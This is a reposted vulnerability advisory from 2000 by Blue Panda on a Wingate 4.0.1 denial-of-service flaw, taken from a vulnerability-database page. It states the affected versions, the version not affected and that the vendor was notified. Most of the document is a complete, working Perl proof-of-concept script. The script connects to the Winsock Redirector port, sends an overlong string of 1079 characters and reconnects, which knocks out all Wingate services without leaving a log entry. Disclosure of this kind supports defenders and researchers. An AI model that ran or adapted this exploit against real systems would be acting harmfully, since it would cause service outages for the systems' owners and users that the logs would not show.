Lucene search
K

wgate401.pl

🗓️ 02 Oct 2000 00:00:00Reported by Blue PandaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Wingate 4.0.1 denial-of-service vulnerability can be exploited without logging.

Code
`=================================================================  
Blue Panda Vulnerability Announcement: Wingate 4.0.1  
02/10/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
=================================================================  
  
Problem: The Wingate engine can be disabled by sending an abnormal string to  
the Winsock Redirecter Service. The attack is not logged.  
  
Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions  
(untested).  
  
Immune: Wingate 4.1 Beta A  
  
Vendor status: Notified.  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# wgate401.pl - Wingate 4.0.1 denial-of-service  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Causes all Wingate services to become unavailable until the Wingate Engine  
# is restarted. The Winsock Redirector Service must be enabled in order for  
# this to work. Tested on the evaluation version of Wingate Pro 4.0.1.  
#  
  
use IO::Socket;  
  
$host = "host.com";  
$port = "2080";  
$sleepfor = 1;  
  
print "Wingate 4.0.1 denial-of-service  
Blue Panda - bluepanda\@dwarf.box.sk  
http://bluepanda.box.sk/  
  
----------------------------------------------------------  
Disclaimer: this file is intended as proof of concept, and  
is not intended to be used for illegal purposes. I accept  
no responsibility for damage incurred by the use of it.  
----------------------------------------------------------  
  
Causes all Wingate services to become unavailable until the Wingate Engine  
is restarted. The Winsock Redirector Service must be enabled in order for  
this to work.\n\n";  
  
# Connect to the Winsock Redirector Service.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Send some characters to the Winsock Redirector Service.  
$buffer = "a" x 1079;  
print $socket "$buffer";  
  
# Wait a few seconds.  
$counter = 0;  
print "Sleeping for $sleepfor seconds.";  
while($counter < $sleepfor) {  
sleep(1);  
print ".";  
$counter += 1;  
}  
print "\n";  
  
# Close the connection. The Winsock Redirector Service should now be  
# disabled.  
close($socket);  
  
# Connect once more to the Winsock Redirector Service. This will disable all  
# other services.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Finished.  
close($socket);  
  
  
----- End forwarded message -----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation